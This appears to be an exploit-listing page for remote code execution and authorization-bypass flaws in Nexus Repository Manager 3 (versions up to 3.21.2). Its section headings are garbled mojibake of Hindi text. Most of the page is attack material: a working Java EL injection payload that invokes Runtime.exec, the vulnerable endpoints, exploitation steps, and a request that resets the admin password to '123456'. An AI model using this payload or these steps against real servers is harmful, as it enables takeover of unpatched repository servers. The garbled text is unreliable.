## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-JAS502N-CVE-2020-10199
# Nexus Repository Manager 3 рднреЗрджреНрдпрддрд╛ (рдкреНрд░рднрд╛рд╡рд┐рдд рд╕рдВрд╕реНрдХрд░рдг: <= 3.21.2)
## CVE-2020-10199, CVE-2020-10204, CVE-2020-11444
## CVE-2020-10199 рджреВрд░рд╕реНрде рдХреЛрдб рдХрдорд╛рдВрдб рдирд┐рд╖реНрдкрд╛рджрди
## рдЗрдХреЛ poc

## рдЧреИрд░-рдЗрдХреЛ poc
`$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/cve-2020-10199')}`
## рд╕рд╛рдорд╛рдиреНрдп рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЕрдиреБрдорддрд┐
root@kitploit:~
/service/rest/beta/repositories/go/group
## рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдЕрдиреБрдорддрд┐ рдЖрд╡рд╢реНрдпрдХ
1. CleanupPolicy рдмрдирд╛рдПрдБ
`/service/extdirect`
2. repositories рдмрдирд╛рдПрдБ
`/service/rest/beta/repositories/apt/hosted`
# CVE-2020-10204 рджреВрд░рд╕реНрде рдХреЛрдб рдХрдорд╛рдВрдб рдирд┐рд╖реНрдкрд╛рджрди
1. рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЕрджреНрдпрддрди рдЗрдВрдЯрд░рдлрд╝реЗрд╕ рдХрд╛ рд╢реЛрд╖рдг рдХрд░реЗрдВ `/service/extdirect`
2. рднреВрдорд┐рдХрд╛ рдирд┐рд░реНрдорд╛рдг рдЗрдВрдЯрд░рдлрд╝реЗрд╕ рдХрд╛ рд╢реЛрд╖рдг рдХрд░реЗрдВ `/service/extdirect`
# CVE-2020-11444 рдкреНрд░рд╛рдзрд┐рдХрд░рдг рдмрд╛рдЗрдкрд╛рд╕ рднреЗрджреНрдпрддрд╛
## рднреВрдорд┐рдХрд╛ рдЕрджреНрдпрддрди рдЗрдВрдЯрд░рдлрд╝реЗрд╕ рдХреЛ рдХреЙрд▓ рдХрд░реЗрдВ
root@kitploit:~
/service/rest/beta/security/users/admin/change-password
POST:
123456
# рд╕рдВрджрд░реНрдн рд▓рд┐рдВрдХ
https://www.cnblogs.com/magic-zero/p/12641068.html
https://github.com/threedr3am/learnjavabug/tree/93d57c428333f98b5927d02630737e639dcb226b/nexus